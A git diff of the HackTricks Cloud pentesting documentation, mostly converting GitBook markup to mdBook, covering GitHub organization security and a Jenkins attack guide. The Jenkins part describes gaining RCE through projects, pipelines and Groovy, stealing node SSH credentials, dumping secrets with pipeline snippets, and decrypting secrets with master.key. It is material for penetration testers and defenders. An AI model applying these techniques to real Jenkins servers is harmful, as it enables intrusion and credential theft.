-* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
+- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
+- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
+- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
+ - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
+- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
+- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) ### Members Privileges -In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**. +In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**. The settings here configured will indicate the following permissions of members of the organisation: -* Be admin, writer, reader or no permission over all the organisation repos. -* If members can create private, internal or public repositories. -* If forking of repositories is possible -* If it's possible to invite outside collaborators -* If public or private sites can be published -* The permissions admins has over the repositories -* If members can create new teams +- Be admin, writer, reader or no permission over all the organisation repos. +- If members can create private, internal or public repositories. 
+- If forking of repositories is possible +- If it's possible to invite outside collaborators +- If public or private sites can be published +- The permissions admins has over the repositories +- If members can create new teams ### Repository Roles By default repository roles are created: -* **Read**: Recommended for **non-code contributors** who want to view or discuss your project -* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -* **Write**: Recommended for contributors who **actively push to your project** -* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository +- **Read**: Recommended for **non-code contributors** who want to view or discuss your project +- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access +- **Write**: Recommended for contributors who **actively push to your project** +- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions +- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ +You can also 
**create your own roles** in _https://github.com/organizations/\/settings/roles_ ### Teams -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. +You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. ### Users -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ +The users of an organization can be **listed** in _https://github.com/orgs/\/people._ In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. 
@@ -108,40 +95,40 @@ You can generate personal access token to **give an application access to your a Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. -* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -* You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth\_application\_policy_ +- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) +- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) +- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) +- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_ Some **security recommendations**: -* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. 
-* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. -* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). +- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. +- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. +- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. +- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. +- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). ### Github Applications Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. -* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. 
-* The GitHub App should **connect to a personal account or an organisation**. -* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -* You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ +- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. +- The GitHub App should **connect to a personal account or an organisation**. +- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) +- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) +- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them +- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ Some security recommendations: -* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). 
To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." -* Make sure the GitHub App integrates with **specific repositories**. -* The GitHub App should **connect to a personal account or an organisation**. -* Don't expect the GitHub App to know and do everything a user can. -* **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. -* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). +- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. 
For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." +- Make sure the GitHub App integrates with **specific repositories**. +- The GitHub App should **connect to a personal account or an organisation**. +- Don't expect the GitHub App to know and do everything a user can. +- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. +- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. +- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." +- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). ### Github Actions 
@@ -153,11 +140,11 @@ Git actions allows to automate the **execution of code when an event happen**. U ### Configuration -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. +In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. -It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB\_TOKEN** of a Github Action when it's run. +It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run. ### Git Secrets @@ -169,9 +156,9 @@ These secrets can be configured **for the repo or for all the organization**. Th steps: - name: Hello world action with: # Set the secret as an input - super_secret: ${{ secrets.SuperSecret }} + super_secret:${{ secrets.SuperSecret }} env: # Or as an environment variable - super_secret: ${{ secrets.SuperSecret }} + super_secret:${{ secrets.SuperSecret }} ``` #### Example using Bash 
@@ -179,17 +166,15 @@ steps: ```yaml steps: - shell: bash - env: - SUPER_SECRET: ${{ secrets.SuperSecret }} + env: SUPER_SECRET:${{ secrets.SuperSecret }} run: | example-command "$SUPER_SECRET" ``` -{% hint style="warning" %} -Secrets **can only be accessed from the Github Actions** that have them declared. +> [!WARNING] +> Secrets **can only be accessed from the Github Actions** that have them declared. -Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. -{% endhint %} +> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). @@ -213,7 +198,7 @@ A Github Action can be **executed inside the github environment** or can be exec Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. -You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ +You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. 
@@ -225,13 +210,12 @@ If the custom **Github Runner is configured in a machine inside AWS or GCP** for If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. -{% hint style="danger" %} -A **malicious Github Action** run could be **abused** by the attacker to: - -* **Steal all the secrets** the Action has access to -* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) -* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. -{% endhint %} +> [!CAUTION] +> A **malicious Github Action** run could be **abused** by the attacker to: +> +> - **Steal all the secrets** the Action has access to +> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) +> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. ## Branch Protections 
@@ -239,48 +223,33 @@ Branch protections are designed to **not give complete control of a repository** The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} +> [!NOTE] +> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. Different protections can be applied to a branch (like to master): -* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). -* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. -* **Require signed commits**. The commits need to be signed. -* **Require linear history.** Prevent merge commits from being pushed to matching branches. -* **Include administrators**. If this isn't set, admins can bypass the restrictions. 
-* **Restrict who can push to matching branches**. Restrict who can send a PR. +- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: + - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. + - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. + - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) + - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. + - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. +- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). +- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. +- **Require signed commits**. The commits need to be signed. +- **Require linear history.** Prevent merge commits from being pushed to matching branches. +- **Include administrators**. If this isn't set, admins can bypass the restrictions. +- **Restrict who can push to matching branches**. Restrict who can send a PR. -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. 
-{% endhint %} +> [!NOTE] +> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. ## References -* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) -* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) -* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) -* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) -* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) +- [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) +- 
[https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) +- [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) +- [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) +- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
similarity index 68%
rename from pentesting-ci-cd/jenkins-security/README.md
rename to src/pentesting-ci-cd/jenkins-security/README.md
index e15154aab..944e9cdf9 100644
--- a/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -1,27 +1,14 @@
 # Jenkins Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. -{% content-ref url="basic-jenkins-information.md" %} -[basic-jenkins-information.md](basic-jenkins-information.md) -{% endcontent-ref %} +{{#ref}} +basic-jenkins-information.md +{{#endref}} ## Unauthenticated Enumeration @@ -41,19 +28,21 @@ Without credentials you can look inside _**/asynchPeople/**_ path or _**/securit You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ -![](<../../.gitbook/assets/image (146).png>) +![](<../../images/image (146).png>) ### Known Vulnerabilities -{% embed url="https://github.com/gquere/pwn_jenkins" %} +{{#ref}} +https://github.com/gquere/pwn_jenkins +{{#endref}} ## Login In the basic information you can check **all the ways to login inside Jenkins**: -{% content-ref url="basic-jenkins-information.md" %} -[basic-jenkins-information.md](basic-jenkins-information.md) -{% endcontent-ref %} +{{#ref}} +basic-jenkins-information.md +{{#endref}} ### Register 
@@ -87,15 +76,14 @@ Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-ab In these scenarios we are going to suppose you have a valid account to access Jenkins. -{% hint style="warning" %} -Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** -{% endhint %} +> [!WARNING] +> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** For more information check the basic information: -{% content-ref url="basic-jenkins-information.md" %} -[basic-jenkins-information.md](basic-jenkins-information.md) -{% endcontent-ref %} +{{#ref}} +basic-jenkins-information.md +{{#endref}} ### Listing users @@ -115,7 +103,7 @@ gitleaks detect --no-git -v If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key: -![](<../../.gitbook/assets/image (218).png>) +![](<../../images/image (218).png>) You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets). 
@@ -129,25 +117,25 @@ By default, Jenkins will **run as SYSTEM**. So, compromising it will give the at
 Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
-{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
-[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-project.md
+{{#endref}}
 ### **RCE Execute Groovy script**
 You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
-{% content-ref url="jenkins-rce-with-groovy-script.md" %}
-[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-with-groovy-script.md
+{{#endref}}
 ### RCE Creating/Modifying Pipeline
 You can also get **RCE by creating/modifying a pipeline**:
-{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
-[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-pipeline.md
+{{#endref}}
 ## Pipeline Exploitation
@@ -157,7 +145,7 @@ To exploit pipelines you still need to have access to Jenkins.
 **Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
-![](<../../.gitbook/assets/image (127).png>)
+![](<../../images/image (127).png>)
 It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
@@ -166,13 +154,12 @@ It's possible that the attacker will need to **bypass some branch protections**
 The most common triggers to execute a custom pipeline are:
-* **Pull request** to the main branch (or potentially to other branches)
-* **Push to the main branch** (or potentially to other branches)
-* **Update the main branch** and wait until it's executed somehow
+- **Pull request** to the main branch (or potentially to other branches)
+- **Push to the main branch** (or potentially to other branches)
+- **Update the main branch** and wait until it's executed somehow
-{% hint style="info" %}
-If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
-{% endhint %}
+> [!NOTE]
+> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
 ### Pipeline RCE
@@ -201,9 +188,9 @@ pipeline {
 For information about how are secrets usually treated by Jenkins check out the basic information:
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
@@ -225,7 +212,7 @@ withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USE
 withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
 sh '''
 env #Search for SECRET
- '''
+ '''
 }
 withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
@@ -245,10 +232,9 @@ withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'US
 At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
-{% hint style="warning" %}
-The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
-{% endhint %}
+> [!WARNING]
+> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
+> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
 ### Triggers
@@ -268,13 +254,13 @@ A **Jenkins instance** might have **different agents running in different machin
 For more information check the basic information:
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
-![](<../../.gitbook/assets/image (249).png>)
+![](<../../images/image (249).png>)
 It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
@@ -312,8 +298,8 @@ pipeline {
 }
 }
- post {
- always {
+ post {
+ always {
 cleanWs()
 }
 }
@@ -322,23 +308,23 @@ pipeline {
 ## Arbitrary File Read to RCE
-{% content-ref url="jenkins-arbitrary-file-read-to-rce-via-remember-me.md" %}
-[jenkins-arbitrary-file-read-to-rce-via-remember-me.md](jenkins-arbitrary-file-read-to-rce-via-remember-me.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+{{#endref}}
 ## RCE
-{% content-ref url="jenkins-rce-with-groovy-script.md" %}
-[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-with-groovy-script.md
+{{#endref}}
-{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
-[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-project.md
+{{#endref}}
-{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
-[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-pipeline.md
+{{#endref}}
 ## Post Exploitation
@@ -354,26 +340,26 @@ You can list the secrets accessing `/credentials/` if you have enough permission
 If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
-![](<../../.gitbook/assets/image (180).png>)
+![](<../../images/image (180).png>)
 #### From Groovy
-{% content-ref url="jenkins-dumping-secrets-from-groovy.md" %}
-[jenkins-dumping-secrets-from-groovy.md](jenkins-dumping-secrets-from-groovy.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-dumping-secrets-from-groovy.md
+{{#endref}}
 #### From disk
 These files are needed to **decrypt Jenkins secrets**:
-* secrets/master.key
-* secrets/hudson.util.Secret
+- secrets/master.key
+- secrets/hudson.util.Secret
 Such **secrets can usually be found in**:
-* credentials.xml
-* jobs/.../build.xml
-* jobs/.../config.xml
+- credentials.xml
+- jobs/.../build.xml
+- jobs/.../config.xml
 Here's a regex to find them:
@@ -416,24 +402,11 @@ println(hudson.util.Secret.decrypt("{...}"))
 ## References
-* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn_jenkins)
-* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
-* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
-* [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
-* [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
-* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
+- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
+- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
+- [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
+- [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
+- [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
